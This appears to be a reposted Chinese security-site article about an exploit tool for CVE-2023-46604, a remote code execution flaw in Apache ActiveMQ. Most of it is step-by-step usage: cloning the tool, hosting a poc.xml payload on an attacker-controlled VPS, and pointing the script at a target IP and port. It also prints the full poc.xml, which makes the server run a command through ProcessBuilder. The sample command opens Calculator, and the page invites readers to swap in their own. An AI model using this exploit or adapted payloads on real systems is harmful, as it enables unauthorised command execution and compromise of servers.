CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具

admin 2023年11月8日23:56:05评论105 views字数 895阅读2分59秒阅读模式
 

# 拉取源码git clone https://github.com/sule01u/CVE-2023-46604.git
# 进入目录cd CVE-2023-46604
# 将poc.xml部署到http服务(Deploy on your vps)python3 -m http.server
# 发送pocpython3 CVE-2023-46604.py -i target_ip -p target_port --xml http://vps_ip:8000/poc.xml

本地环境测试效果

CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具

poc.xml : 你可以通过修改poc.xml中的rce命令来做不同的验证

<?xml version="1.0" encoding="UTF-8" ?>     <beans xmlns="http://www.springframework.org/schema/beans"        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"        xsi:schemaLocation="      http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">         <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">             <constructor-arg >             <list>                 <value>open</value>                 <value>-a</value>                 <value>Calculator</value>             </list>             </constructor-arg>         </bean>     </beans>

项目地址:

https://github.com/sule01u/CVE-2023-46604

 

 

原文始发于微信公众号(Ots安全):CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月8日23:56:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具https://cn-sec.com/archives/2188444.html

发表评论

匿名网友 填写信息